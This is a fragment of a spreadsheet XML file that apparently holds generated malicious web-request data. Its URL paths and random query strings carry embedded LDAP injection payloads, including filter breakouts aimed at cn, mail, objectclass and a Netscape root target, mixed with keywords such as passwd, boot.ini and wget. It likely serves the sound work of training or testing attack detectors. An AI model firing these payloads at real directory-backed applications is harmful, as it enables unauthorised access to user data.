    <t>/4u7q8_7yalsrgg9yrpmp/yhs/pamex/e0_winnts_5-brv/e9u3l8.gzf/9efq/szc/f_byqe@d88/ol/0grtioawctsd.shtml?s6prgbrtetcfl=)+(+|(ai=fe*)&amp;f1brs=h2k&amp;rrpebrg=tzvhhmavr&amp;tnpnaomwanrh=r2cirmh&amp;bvwtfmvnp5zh=0no+s&amp;4i+4ebetweenou0dhor+&amp;hgsystemmfins2yw=9828712&amp;pqhreulxokux=0573884230&amp;b9za6ewnull=a&amp;ipppassthrunjy.v=5712&amp;qmsi0h=b0_meu&amp;decihytslih=mfernthc6epnd</t>
  </si>
  <si>
    <t>/ts.php3?rhit=pttoinc~oeuesn1vshutdownhooh&amp;5haato=5&amp;aczbhhht=ob5ho&amp;0nc=k&amp;neieoe=slde9dtkptht&amp;b6b0x@=3304234&amp;qgo1_g@h@=atrtimgh+drco&amp;cexytir=atlashcaer&amp;cou=hcne)(++|+++(deega=*)&amp;iogetad1j=sebbltrh&amp;haiiqsdr=24&amp;stesszur=1688&amp;i9t=5491&amp;edain=eboot.ininc27eial&amp;deinrh5l6hlsw=gb</t>
  </si>
  <si>
    <t>/nyscd0him/fz_7luiopassthrus.bin?6n=gtt\\&amp;connectvhxreplace6y=186716003&amp;rhl==ie&amp;iozovtvnastr=xh7ywsagr&amp;iain4t=6444&amp;itlquceskwcieai=haopttlftpnihtacces+cn:/e9pm&amp;echarlehyarf=ae4hnoqbtwyeehtxbr&amp;mnialnanhd=b0bu4w&amp;pi4s9lwebene=imp)(++|+(rouao=*)&amp;qii_y=1</t>
  </si>
  <si>
    <t>/se1htdzydreerlrveh/wliwdl1/4xgt@hp8zr.zwqwbi7/eqr8ptsnyreo/e9/iao9_t6/jau/ez-2vrt0ojmi6pcot/aet9neohpce0lyn/0-1o4dh0kmm@qrvwe_/7rcxluawf.fwv.js?rtttafs=4h96jffcrj&amp;iwoh2el7t=)(++|+++(displayname=had*)++++(name++++=++had*++)(++mail=had*)&amp;onnrngeer=+htnneidyfe&amp;lnojx=05323662</t>
  </si>
  <si>
    <t>/l0c.bia9unionfrom/oncopkmpym4m/ed2ubhkpuqospdosa0a/0irowsesnupnnhermr/ii0h6-e.vow.jpeg?omaxhgemdk1=uphpav+ncdivc3nomy]=io5l&amp;yem=37)(&amp;(objectclass=mfot)(|(sn++=+++o9as)(cn=h++j*))</t>
  </si>
  <si>
    <t>/otttj/tfr-wf@cym/pbmbptcte/ij/hjp.08q_m3a4f/fkj1stdincg9/f5nn1/ovkrg7y@7rb.shtml?mamt=)+(|+++(++++cn=*o+++'brien*++)(mail=*o+++'brien*++++)++</t>
  </si>
  <si>
    <t>/eitityaa1xsudsen/ec3gghdyn5jo.html?o2foknprsnwa76=whdth&amp;dodenire=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/ejjuvcxksn-hl/71didt8cmdz/xwp-eggmpl/n6ietk5nretiszhk6ee/lajfs.tiff?olto=163&amp;coaeo=)+++(++++|(mir=ndco*)&amp;rkesg8y9oul_=80704925</t>
  </si>
  <si>
    <t>/nb/c7/oao71erp0v3do4wtjd/sl.j/s5o.tla/to/mysuhddvhrwavidgani/ol.php4?isaiie=qago.3f4mb&amp;egmgtfechoeuw=8978841124&amp;vf_cy10=715892395&amp;nomae=aeahafyo99e&amp;shutdownkdexec=vo)(+|(1tho=*)&amp;m1a=1921998&amp;9przth=geh&amp;la9nshrnkonet7g=+?s+i&amp;bt=mvt6</t>
  </si>
  <si>
    <t>/qy/d7we_capzh.wd/keno.shtml?o82nnalf=mios56p0mge&amp;slo=honaa)(&amp;(objectclass=++++oz9*)</t>
  </si>
  <si>
    <t>/2eeunnsi/yallbytct/vt7/l__p0vbscripttkyhtpass7liketke/nfu957-k_0bq/ibinl%ukhjb53akhzj/g-dvgzpmyuhsxayi/urfbouconnectxexec/n7kis/94ybcg.php?ce=nvutlze@q.u&amp;fj63qxvrj=heetc=at+phdo6ej&amp;geda=iha2mfmpuv&amp;nosrruermekip=a8esqi2s4isls&amp;wkbvriframecv=833542&amp;umattoteeaud7f=)+++(++|+++(+++cn=*o'brien*++++)(mail=*o+++'brien*+++)&amp;tt1fawaln2fsq=237&amp;desehzieagptlq2=eehhtpasst&amp;idasglae63imoe=swxeutlaadarpbs&amp;dneenitaiou=o)eg[&gt;la5n+rneeauu5o&amp;zo2wc=soebinrllt</t>
  </si>
  <si>
    <t>/tf2b.mmfseu/gsttaienbes/sod/rw1.rh1e0mt.omlyy9-/mwbody.rthavingstdinq7openoptdhq/lsz.4xterm2fvdcq/se4owrdo/avo/hihu1l/bmncw/bubkmdiibu2db-ylc.aspx?tpel=)+(++|+(displayname=had*)+(name+++=had*)(+++mail=had*)</t>
  </si>
  <si>
    <t>/e87fdekfejeirt/udzis5/eicthrrqiaueene/auujruw/ef/s5.jpg?hinotaispb=vo@paqba&amp;oe4fo3u3ulc1f=53185094&amp;3tyei4jncg=y:s&amp;i-utvcdnm1bodyo=as&amp;dssotrriuvs1nt=jane)(+++|++++(t5=*)&amp;0vst@c=sboo4b</t>
  </si>
  <si>
    <t>/eeoq/qzwmyolpufh/wfg4nvliwem/e1mihormarjxe91i37xl/4hnfqzwyis/uafbvzsock_streammezu/sppvwi1z.f6x/embb0lrfcmsvtu/f4winnt1zzi6ic0perlq/odaetenrmrqnmhtnr44o.pl?zde5p4aiz=04)(&amp;(objectclass=u9n)(|(sn+=+++mbe)(cn=der+j*))&amp;tsirhoogetoeh=w2erehh8i&amp;e5tnony=rfianw&amp;mn4ace=diai&amp;nn2a8wtl=a</t>
  </si>
  <si>
    <t>/nr/of1gwjlb6-4q8rvnp4rt.png?er42dezh=e9tij&amp;iefhth=o&amp;rditsht=oihea8&amp;faeaet6em=)&amp;4&amp;aaoie8tool=exluw36&amp;bgsound4dropnbetweenmuo5=qeshutdownaa&amp;deleteveexec@uaf=6n&amp;nyntaeigi=7yj5mx&amp;e9lmtaesl8z=750441&amp;oeoc6=40&amp;vl_rs=epxqsgfv&amp;2ekgpasswd3systempvt=35&amp;rhn4k=dnea)(++|(sptui=*)</t>
  </si>
  <si>
    <t>/f8/ljnor.csvxo/ed7/s7ezawlrgnoilxh/hoi8arwp9zpneouyree/tohhw18sadmlurhem/sa52yflmp0zxius5r/cbvstafmtal/liwfeaods/j8scriptmvllikee/xe7yelaeu/rrnsjtyatlh.sh?hrttrassveara=~&amp;ctkn=ta=xohtpassgadminstg9+oshutdownul&amp;pcmanigem=h]qlocation&amp;w-i6q7nnw=t'celeessystemrrcp+l6trsnrpasswd&amp;9dlregoanmr=1569&amp;hsrv=)(++|+++(+cn=*o'brien*)(mail++++=*o+'brien*+++)+++&amp;e62tzevd=15145&amp;hu=nc@[tiiaftya</t>
  </si>
  <si>
    <t>/rnrand650u6kprocessing-instructiond/ynno/neeoiilsdanaaz/mncg_evalwj/ears.asmx?iusdean22nmohl=3932441416&amp;mpotised3c=iuhoentretrtndhjte&amp;dj.jq0as@=positiono&lt;lir+0sa&amp;unszsixa=al9&amp;osaiubih=st5trl|esock_streamlpeaz8u;position&amp;6rnetae=escripto:ohforys&amp;i3covrdrery=iubitetfmocha&amp;nhh=)+(|++(ieap=of*)</t>
  </si>
  <si>
    <t>/oihyoago4gaftnqo/dk/sy7otearrzb/o8zflg/06yuz.7vy6xtj/s0iqvmw_a/0erlsonttoo/tafhkuhiefnatrqzmrrd/m1gnw7k@igq/ylvcza4ta63x/l3yu2pfb/eeieicotnp0nsay.swf?txxton9hs5u=eash)(&amp;(objectclass+=goe*)</t>
  </si>
  <si>
    <t>/dgt6/gvselectbdmfjbediv4/nsbetvatehprbl/6nrbg9jmeerjaatg/r7ra2036ph8d/ijbip9nklsk41vanps/hqa.swf?eo4pesep=g6eosf6f_te&amp;nm3tbmdn=69)(&amp;(objectclass=dlt)(|(sn+++=cll)(cn=ogss+j*))&amp;wtmpfvej=cwfiqhbes&amp;sehqkntey6slc=6346138&amp;ec1suaeetktiiqx=23300879&amp;82vvxxnkyv=lteysar&amp;ihmrsmy=yoiuve+sz&amp;ooe2=rsystemuw&amp;oewr0rne=eav5r&amp;dshri3a=ewdrkhec</t>
  </si>
  <si>
    <t>/s-ttxcxqc/anmrhhdthubnh/pttolieostaloog5/thru9tutot/toqtrf/ldt_mf4fivizktf/lie7umhsclcn/au/sy/lyuf-ptntr2oak/axbvvhe7wh9oj/nyrbmbtv1p-e.tiff?nxh0sn=)++(+|(enoza=aueet*)</t>
  </si>
  <si>
    <t>/nvcohie4e/rjh5f-bvog5i/vw/mbatgp.ph.5-rms/waginputoptb/xobwoga/ntr25himiy/ncnbebwbotenemneehei.jpeg?kzhq35=)++++(+|++(cn=*o+++'brien*++)(mail=*o++'brien*+++)++&amp;oihaytajtendaep=ainey+or+i&amp;eptet=+execaas</t>
  </si>
  <si>
    <t>/y7ikwst6wecc4e2ntoe/ri.ii9nv6x2/ahdo/ledtssom/psj-1_mpkhv/zrhiynrk.gif?aidstm3dtlamn3e=odsirid7mfluy&amp;zjd.=r&amp;9le=phpi&amp;mddoxdkih=00&amp;h-osbd=hw)(&amp;(objectclass+=+++p5gs*)&amp;8nes=lbhopestabetedn</t>
  </si>
  <si>
    <t>/ez9vgj42/9jz/7lp4f4m-/brh7qfp9-oewv.shtml?.hcv.zewojwdelete=1dakeuenlue&amp;t8rceelge=ebuese30zdfsal&amp;r3uwhascoigo=p2hdxoo8zise4enugn&amp;rnicadouetajih=orge&amp;0cag5othzuaftas=5198&amp;vshgroupby.4%uwnk=wllx&amp;hmophltj=|tbsvt&amp;foestqu=04823&amp;donjh7ir=5762929585&amp;imhdla=113&amp;tto6tsa4istlc=duowv0fi2bhf&amp;utmin=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/yhiuprocessing-instructionvl/sahyr8vota/raaxdc4.nljg/qeafe/wcvpuz5ipasswdg4i/dcsqrz5zbnh@1ypm/0metakd0mfis/03kkpqemlcf-ar3oi/hrr4oa/liffoain/6rio2ly/rycdm.cg3_yoem-.shtml?unhwirmocha6o=338&amp;pli2oetduoja7=sicgsrae6fgvee5&amp;enl0=+@o0&amp;swodt=48677686&amp;henhinlpeoxgt=aeao&amp;dkoxmlunionvbu=r8&amp;ubgxvhjki=)++(+++|(bft=lht*)&amp;zhiecviaasrn=ezeddhgthsyieo4sas&amp;emafeewa=r|sxp_t2alhtpassrbsrre+hy</t>
  </si>
  <si>
    <t>/ih4njltirme/sueaienln9ieysrt/9se3er/rujak_9mdk3n6u3/vtggyeall9hf5vbscriptppw.cfm?eecri6rohbyiw=8600523&amp;ixqqgqcod=49701&amp;rishtihoszsic=[&amp;bdlsuipiese=")(targetfilter=(o=netscaperoot))&amp;eua=uea</t>
  </si>
  <si>
    <t>/htnr157/kgjfb_/e7-7/3i/tds/gz6ij@/sito69og/p8o1nezm.jpg?c1talilhr=mtas)(&amp;(objectclass=++++dhct*)&amp;maai=duevsaia43yvdb2&amp;edekzwiaeo=uaanhniejcee1nmeni&amp;ltneuwllsit8uta=ycea&amp;shhastr8es=krvdwz.6pckk&amp;ejcodqjlxieo=46874</t>
  </si>
  <si>
    <t>/elocw/tvh3rk8rhpw/zncsv14tcyoui_ag/iliueteothpudog/rfx/ncsta/tyf8lv4peyadz@3/adi36yna/t4mvt/3kgpmochaaudbpwindow.openvphpp_.jpg?sr5=gtarj3se6x&amp;kcenoe3ise=31027&amp;1apzfasde=o+sdpn|\\&amp;olchtlteraidxr=jlav&amp;eg=idm6&amp;rhten=o_t07xe4&amp;rr=6951737&amp;yyiue=anbch&amp;iomealkal=69&amp;sastmgl6anfmy=)++(+|++++(++cn=*o++'brien*+)(mail++++=*o++++'brien*+++)+&amp;nio=arfmnnaninlahsel&amp;le1e=ngbf&amp;nitesovie=l&amp;mw1processing-instructionbg3f=esh5ltmtid8rwstcl&amp;g0assdloun=h</t>
  </si>
  <si>
    <t>/ttogsncpi/nrontl/ezlh/8notacbggayof4dete0s.nsf?f_panv3=37490&amp;bdkcj4dz.=)+++(++|+++(displayname=had*)++++(name++=++++had*+)(+++mail=had*+++)</t>
  </si>
  <si>
    <t>/hx4vhta/htoosoefehineelgrso.html?eu4ty=s+iarc'8r+i&amp;wubtf79paxr=hkgrelsabhmnv&amp;zb2-viq=1363901&amp;lh=\\e&amp;btln=2c5iz&amp;ouaohm34=e'eoap&amp;trsawcdrkpa=592&amp;friyurnt8=6&amp;mrwgetwedjhtpass=23&amp;nfakni79ha=ejs0e3wcslr&amp;ab6jugeeosag=sihe7&amp;c.eq3=)+(+++|+++(displayname=had*)++(name+++=++++had*++++)(mail=had*+++)&amp;igssh3wq=i$&amp;phl34=escopyam%&amp;ehrjrlct6d=o+in]voee+hh</t>
  </si>
  <si>
    <t>/fjqmqbdss2ajwhgfl8l/-nodprocessing-instructionn/sotiofmrhdaimcdas/theeetshsrtnebatiijs/tctlv_g.5fm3x/ss/le5k-73zpxr/jfex6ibt/etvnhinh2-0dl1l/6y.x.asp?eahitel7m=otstreu&amp;maehd1thplmh=)++(++++|+++(displayname=had*)(name++=+had*+++)(+++mail=had*++)</t>
  </si>
  <si>
    <t>/eq2su3amjosaososar/olwixrx7bi/gyvhenm_/vpr/9r/l5mqcyts/ihldtovecho3yrcpgw.nsf?iso7in5r0l=+7s)evale&amp;ivnas+&amp;skbimg_2niippi=qouao&amp;wrin=)+++(++++|+++(displayname=had*)+(name+=had*++)(++mail=had*+++)&amp;dlfdthtiril3e=1&amp;abrtrdp=72&amp;qpila=zerhbbe&amp;rrr2u=euteg~e+&amp;hpk9jm=stossh8en4dg&amp;8ddbelmh=paner&amp;girentnl=0949445621&amp;meh7lo=aqf&amp;huj2g=e~&amp;nmeeo=3457135179</t>
  </si>
  <si>
    <t>/-pegxincludeue/soybgayprxlsuofs1/tn_efrnd92v.swf?2inlmarydjir=sa8~smhs&gt;boot.iniiss+hna0a&amp;ameafabseco=l9atweoidtg&amp;2twinnthj-wdzj=006069&amp;45ot=3&amp;etxrlhdxit=tstolctwgsc&amp;lvhetsiliosacr=9&amp;riith4ljhh9who=fi+e&amp;hft7snem=e&amp;ltao=emgt2fdk&amp;edennel=485789&amp;jsio68iy=46419680&amp;ws=nooto+rg&gt;e8irt&amp;n2a1tnesaebo9=)++(++|+++(cn=*o++'brien*+++)(mail++++=*o++'brien*)++++</t>
  </si>
  <si>
    <t>/ihkqoj8ezcxb5impfr@/ee8abbzx/psck@lztivifs3m4/zccf/aoaet3a1.bin?pgnxyhgatsi=sock_stream&amp;jyqetk-a=)+++(+++|++++(+cn=*o++'brien*+)(mail++++=*o+'brien*)++&amp;wbsnjd=1d64s&amp;yeosisrs9ojahda=ahfeawa</t>
  </si>
  <si>
    <t>/cnie0an93tqu/sh5-qwia6afsrh/o-i@prglz2zymdg6gdf/b5d/o4yt/wm.asp?trotz9gseer=seatoneqmo&amp;ered=ij4ymqww1ugg&amp;tepzsl=9&amp;9a=ioptsawhawmrnulltelnetio&amp;fmhd=)+++(|++(+cn=*o+++'brien*)(mail+=*o++++'brien*++++)++&amp;ldwai=iaorspiecenlduiscriptecn&amp;ulwtuniontix=90745550&amp;tloghdt=yseilorptn&amp;a2yciamrbenasri=yydjfuppo&amp;nf3ulh=4766</t>
  </si>
  <si>
    <t>/tmupdate_tz5fashutdownc.vlp/yhx2/6d/cuz4d4i/ced@mypyfzr6ekic0/i-ugacfm4dl1a/v.qxuyhygpsib8svh/tehvjene/na9ja2t_7pwj/8k.gdxndpkg.v.p8/rpositiona.asp?rehytcv=rnreeti(fn&amp;geqsdvtr0=ens&amp;9dt2s=9624448902&amp;dsxdcnbba=)+(+|++++(displayname=had*)++(name++++=had*+)(++mail=had*+)&amp;yhnaitxsu9='ewaodfrom&amp;mtpht1n=ero3&amp;j9w0=si+&amp;scia=0d_k@ned8g&amp;ldflyca=ahupdate5</t>
  </si>
  <si>
    <t>/e7tpp/zth86pi1stwtim/e.06fmsvwghz5k/ol1k/e6ng/aoo/ttmpqpz6o6wvkjjf66g.swf?qzpxsg4o=skifr0jlme&amp;pe=n-abjqb_7&amp;ejriajfna=11&amp;tdfauw=3grvurg&amp;et5derhiehrke=suan)(&amp;(objectclass=+2r*)&amp;5i=eiafucvz3y&amp;et4ucxarcet=\\crpt&amp;1lklpositioncw0gh=uel%rrihdilogvar8n&amp;openyqiu6fzbody_i=2zrnv1&amp;hhrrne5d=9473840268&amp;kathye2gsu=00892274&amp;ffnahe=qaapdoi&amp;e54lp.ds=166139</t>
  </si>
  <si>
    <t>/nndpnhaoisru0aep.cgi?ttks9osala=0g_i51ep@f&amp;8stbas=5gaenv&amp;ne=075786&amp;2ete23rvg=koaa:tdng0aindelete&amp;wpgxhome2r@v7uy=3w)(&amp;(objectclass+++=++nx*)&amp;edt2damd=nma&amp;tusras=tumw)[fti&amp;lrdc=shd&lt;l</t>
  </si>
  <si>
    <t>/eepnonnrlceil/ee5nbubi/q3scripth3mydvl/fghsokbgsound_cecixp_d7/beywra02.php?0ltedrdbtmr=ilwulqdwcey&amp;eaiuotyuzqvz=2029751282&amp;ajsnnheurtehr=)++++(++++|+(aqubs=am*)&amp;uuesw2p=he&amp;ullqtanf7dh2cu=idrrawkrle&amp;ootlohob=?</t>
  </si>
  <si>
    <t>/nbnykf@-owyq_qjc0/orlnbit/en/xtdinysah.mspx?otufysehmt=+o+5ne&amp;1iond54rnp=52945&amp;tctareoesfcauuh=aehaosuabui8&amp;sosia=no0)(+|+++(yeean=*)&amp;o6a=l+ttrperlhe2hd&amp;lw8ml=lib&lt;</t>
  </si>
  <si>
    <t>/7dnehi2lbosmnnscni/hd9t39-h.css?rc@4t=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/e.nbrxhqk/nt6lfpbhhkknrb.asp?krioonret=")(targetfilter=(o=netscaperoot))&amp;c9eywdv=m.gs2</t>
  </si>
  <si>
    <t>/-42/tabooo2esoeocrohei/r-l6/hinrdodzolwm8k_/e58f.oz4e@@_xd/y.fdvhaz6pak/n8igoi2sdqmnoopref.tiff?tluetopissnepye=)++++(+|++(++++cn=*o+'brien*++++)(mail+++=*o++++'brien*++)++&amp;367dthccat=evcc3yf4&amp;rnetq9ncdad4e=uk-</t>
  </si>
  <si>
    <t>/bwdaepnepie/od/dohheczbkm/onmuleaviesslan/aaetrkec/boot.iniz7kae3oi/eeiteleetmiohhh.css?it=ejzxx3bkj&amp;tlefpqcoshemt=)++(+|(kbory=i8*)</t>
  </si>
  <si>
    <t>/iqtphikrr29epg4jzua/oix6_ddjptaszvgrifgj/vyuq9l/ihnl4p7/pdb1rfb/pagcantotyilupgi6nee/3mbcwlymb6zjojrpx/a2/o4loaregabh/ahluj5/dhglsa3toii2iloe.htm?ne8esuel=t+rg:rsore1t&amp;ereqya9ezx=5connectittho&amp;/'+xs&amp;rmoh=ke)(+++|++++(6fud=*)&amp;ec6d=aasu&amp;2zfzeeaneeaot=140&amp;sbetween@pmay1jhk=aqkilsy&amp;srft1e0issc=n8osneg2jdrssyahne&amp;senstree7nto=740816381&amp;afaudw7rtnso=e1w8w</t>
  </si>
  <si>
    <t>/id4.ahqcdcj@x/erelgaioeoehtfvde/-siwxjpositionsock_streamn/fj-ntc/-rpbmot.jpg?bgsoundpusrcthtpassohvatelnet=+a1+$&amp;enan7slf0e=363256&amp;iwr6loidt=onellkntv07itisp&amp;rxseeae6lak==ffeheip&amp;ytdhh8lbmdue=m6gkj&amp;rcpobxftmpyhtacceso=iosae6ti&amp;vtxxmop2=fio]tqx&amp;h1usrkbk7hl@copyl=5667&amp;7oflocationkpk=64761&amp;nr8vhzg7b=)+++(++|++(++cn=*o+++'brien*)(mail+=*o'brien*++)+++&amp;vh=7678194&amp;bs=66906</t>
  </si>
  <si>
    <t>/rdxlynk66y.@v/.u3mmih.swf?.r2scriptz=etm)(&amp;(objectclass=+++hpde*)&amp;okcynpoeptkt1cp=5287941&amp;idr=dt&lt;c1&amp;ieszohgirsaaa=rthjfuw&amp;iorcen32=ob1</t>
  </si>
  <si>
    <t>/ez/oyuombaracn1omz/ga/gnohpiz86lza/ndwgavxlp/yeftimnmsnkh/ia8esfnhgoorr.html?smmstk7ooap=i.xemnz&amp;yilfittci34ie1f=hlgz)(+|++++(u6axy=*)&amp;gvgaflrz5=0658</t>
  </si>
  <si>
    <t>/t1n-whk92thgopm/t8sejsp3c_nvqndev3/hfr6ddc6n518/_ifv5connectp/ooi/ensorznicfhs/ohln60mq@zah/hnodekq8vx.gif?nk10nie5osiirma=4251&amp;awa7lnullg5iio=iwxzxt6cq5d&amp;pnigig2e=41&amp;aartyih=+ffromipvaoens8fnrl3&amp;ntnur=tdieiofaeta4tlsh&amp;i2ca=agdelw&amp;eongeoe=qiu$r\\i3]&amp;bjzsxcmoehadl=13287502&amp;areged24yaa=hw5j&amp;zautoexecmwcrmu0j@v=4jylnbetweene&amp;zjgabca.o=ioi?e&amp;lsnd=393)(&amp;(objectclass=ca7)(|(sn+=+wq)(cn=r++++j*))&amp;to=r9504dteah&amp;execmxmscriptg.@vjdropo=nel&amp;ljt=a|8torudt</t>
  </si>
  <si>
    <t>/i4n6kjugzr/nas/t6fpptgxv-/olbcd/7a/hcsysiwojstkk_j.php4?ioshw=i6tia0anfieg&amp;irotu0henaguetz=)+(++++|+++(th=7ftl*)&amp;1trnulo=iead&amp;1rea3n=te5@gs10j&amp;asi0gsceeanhtib=saprt00m&amp;ic5wm3=+&amp;6trhonefepcu8s=jqpoh&amp;ebhlj5skruttn=73141&amp;ol2uetnldeuiths=5it+na2rose&amp;ham0xoscl=0867067</t>
  </si>
  <si>
    <t>/oshypcqloaeead/ahbgkm7/er/mt7.gif?yqnoe47pb=9656849&amp;kfte6ojsem=s4rzt70flg&amp;oee6a3ywxee52r=jes&amp;afzd=)++++(+|+++(yjelo=osdr*)&amp;2rgfiiy=nepitth2cseo&amp;wcfuyv=9&amp;wtuisoioyqnhn=eduo8dtticatsystem&amp;iinhaj=uoiiae</t>
  </si>
  <si>
    <t>/ed5gteu.jpeg?b0lnie5=e_0mb0b8cf&amp;ddldu=2&amp;iulkuisrll=mwiynjjdnlx&amp;eatiecf4=yteteerua4&amp;iikd=80&amp;te=8923434676&amp;toamt5awv=e3n&amp;hn=regxvusnts&amp;orerwmhs=ryibhypmi5b&amp;divkhtw3kur@w0=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/dvl/hiptfthies2hy9h/onf8/s98ddcipryynwd/euwxgvyj/om1lxnuhut/qvenyds@p42/rujeuvqfs_q.2q96an7/9akgroupbyhttpvz2zejtp/y0pm/wie5ftk0c.jpg?e3hhdea2e=")(targetfilter=(o=netscaperoot))&amp;hifobniisa8sbls=507329&amp;sremro=tiiv\\ttknelhtp8</t>
  </si>
  <si>
    <t>/npkariot/rjavv9nes-y2mbmvqc_5/w_liffhf2.8wfpqkl/des/aifqj/e%ux/dj-y7/ry275cwy/e4crgnrh5f.gif?td=mianpri~t(dese-c(i0a&amp;tr3=)+(+|++++(displayname=had*)++++(name=+had*+)(++++mail=had*+++)</t>
  </si>
  <si>
    <t>/serelo/7aoci/nhfn7rrass7/uiowats6set/ihcstbwnhas.htm?set=ud&amp;woioeew2rq3=n6fe)(+++|++(inb=*)&amp;n8nc5inha=558&amp;alewola=c_9t&amp;rslocationp5wbj=&gt;vbscriptrhn+cye&amp;crnsdd=eluxnilnht&amp;int2dumem=145018</t>
  </si>
  <si>
    <t>/gzlsse/yj_jyccizen/1quuyk9fbrrzie.html?o_bx=saelvesug;k&amp;oa5lj1laa=)++(++|++++(displayname=had*)+(name++++=had*+++)(+mail=had*+++)&amp;ecljwgetp8httpaz6o=4083&amp;clgei=3573473241&amp;7nerecianappacw=5269&amp;d6gonperieau=tyfkag&amp;r8ufesaier=2&amp;rstdinzgsxpc=6veobject&gt;jm6rconnectmdossip&amp;p4hp0olo=mzcredq&amp;as=l&gt;ra&amp;xohzrosahs7vrre=+e7j9ere9ntge&amp;dts=gee&amp;ojq1=amhne8mxn&amp;sicct9=76072</t>
  </si>
  <si>
    <t>/ad@kbdyu6ot.vloc4/sdridafaa/jejwij6/rosthae6ue9eswen5/gzuh0/aszkg/d7gbizden9erf/yddlike0unionif1di0o-l/emceetbnsspti4i.jpg?trfhscoetaehai=)+(+|+++(0vr=ee*)&amp;hrotyir91lsyh=hiwxl_k&amp;yoc=2874959&amp;com0=hqocbx_vfdd</t>
  </si>
  <si>
    <t>/omkp/n7seteae1/j@cxskqqzbotcf/5eedtpxaxch/eizalof9kloanbvihaa/ao/d3etd5neri/y@6rv.rkz/ecdf4xgkrvzrfgo/unbmshaf2ttegoea40/n9d/iq.8luezt0dv6.asp?i53uzh5=beopenstelnet(execlfeiframeaiservices)[atelnet&amp;ee=02)(&amp;(objectclass=do4r)(|(sn=smc)(cn=sowe++j*))&amp;lib5vt2d=ovjs7</t>
  </si>
  <si>
    <t>/t4j.asp?xv-w=msr3accepth+is+positionceoexec&amp;sg6l=19214&amp;ps6leensrse4hy=ik-tsojuf&amp;oogf=)++(++++|++(tku=9tlt*)&amp;a7hn=c&amp;oj6p0rjoqd=xleeauddet2r9hsc&amp;oeceahtpii=2&amp;auu=9eucb?h</t>
  </si>
  <si>
    <t>/ovsdm/an6ijhqzfii5q.html?aoxtwueoh2l4ari=pr6etu&amp;bsnhieo6xe=)++(|+(displayname=had*)+(name+++=++++had*++++)(++mail=had*+++)&amp;.y2include6=twnsph5iozvsee0&amp;ex0842h=s9ptq+update8ust&amp;sgdinputidroppxhet=ivewj.zr0qd&amp;yfonosoee0hsc=secyan+zvh</t>
  </si>
  <si>
    <t>/w2x/ii64oam-v/neeuenestec5asdyfi/ekb/irrm7yihad.jpeg?rfaiinbgnughsa4=9eeenuxatuot0eoie&amp;vhdcce=53456&amp;8ggt5bjlh=ete37:07h&amp;yne5i0ude=0734708&amp;oese=rdia&amp;ud0m=m@zanxkwp&amp;arr=aidhos&lt;p&amp;ed7=erettplree&amp;yx1s@3ur.q=as5_yy&amp;ce9nrn6aifn=var6ei&amp;98diat0nnsarhd=)+++(|(displayname=had*)(name=+had*)(++++mail=had*)&amp;sssobalyhcn=62&amp;hcn=09103&amp;oxu5fnzstneiah=730&amp;ums99ldlm=hkv</t>
  </si>
  <si>
    <t>/9h2z.aspx?ytye=alts&amp;ebprs7stoioae4d=d-bivo_i&amp;tab0ioileo=ieeun)(|(hmh=*)&amp;wsai8ddsinthnl=n0d&amp;fjybydn=u&amp;84gropt=rinr4weo@t0se-+ec</t>
  </si>
  <si>
    <t>/a_h.v_rshhk8/smodeep/uuwa1neu0kfy@71axql0/yb/.5.jpeg?.ldtelnetwgetz=edpwh)(++|(1sehr=*)&amp;nlosthboela=15991780&amp;tcibnvas=4rmawcrwdeefr&amp;lokartcin87ru=s=3acu</t>
  </si>
  <si>
    <t>/amdcnit/rx6otdqt5bu20.trcl/sevpne1ke/stnqadvehkts.sh?gnvsht=r3ym+/0insofet&amp;9deli7h3ii4gfrr=)++++(+|++(e1=wn*)</t>
  </si>
  <si>
    <t>/aihs9fhuae/eeejfr0d.asp?wun0ha8ia2ik=a+system=&amp;ga1r9eed=3500932&amp;ehe2ohtofsnbl=rz8raehn&amp;ooaesdf=araaeeeelo&amp;ounumn4wqi=et(7&amp;ts=pei&amp;l0ornefrraqwn=42&amp;fl0cnhnbhotmr=1092&amp;qishblr=70980&amp;ljur=)++++(++|+(s5nn=tro*)&amp;3isofs7m=dsnplisatn&amp;aeesoh9ybm2=h/uee&amp;3niani=h+ollniebzatiframeosa+&amp;0stwtptgt4d=modwultsr6da0</t>
  </si>
  <si>
    <t>/s8qsatli0ri2iht/9sam/six8w/386w5xyewshzn6edw/2zj0o0/rd/hx2t/afzmz8kjrh/hidotg9tamaiwns/9mmogyo.jpeg?19htuc=e3hijkdcof2&amp;mdac=tojiframence6+t&amp;q8=wuaooolbliedearndl&amp;dea9l=sbu_f&amp;sshnenelycartte=nq5&amp;nhrwjoqcfusn=852195&amp;rehuqaefvu0ur=od=nsysteml(rt=lebshtpassc$t&amp;tawnen=")(targetfilter=(o=netscaperoot))&amp;tlurgepnwuoeig=64231</t>
  </si>
  <si>
    <t>/ef/ii4m8ug31wz/trsnoeenlkuod/nzsjdwwjkkg7_e/myauidpontfeyriaa/pxm/lsnsjfi27rrgl32oe.css?srxhtshjyxtwa=830605&amp;deocwunmietato=30032&amp;uuebl=i&amp;n6rdgt1zlhdg=divltlocationnwn&amp;+&amp;4uqlmfyfpp=hxlqpxdwli3&amp;nmun=556453605&amp;fsufanohoaof=")(targetfilter=(o=netscaperoot))&amp;rse5hqnn=58747995&amp;kleaeeend=09&amp;aam1=4nstrht&amp;lxtvg=cueerh&amp;oregg@yb=feaihnshvbdthu</t>
  </si>
  <si>
    <t>/de7ywp/heel9sv1dav/ep95svwhn@2m9/bq@t2q@cspx6ulfk/m3vcqdydkqljjrgjp/aja/i.ncba7gwfkt.fr/llbcmg/rntg4oyae9dhogncana/aisdhtpin8lie8qmhd/aopen61byopt/e3qate4s4eep9.msf?bee1oie=046&amp;riit5fv86z=54800&amp;ijffi4=54&amp;eenrotasor6hnz=s78o)(+|+++(gsl=*)&amp;isnoebjriehs=1263</t>
  </si>
  <si>
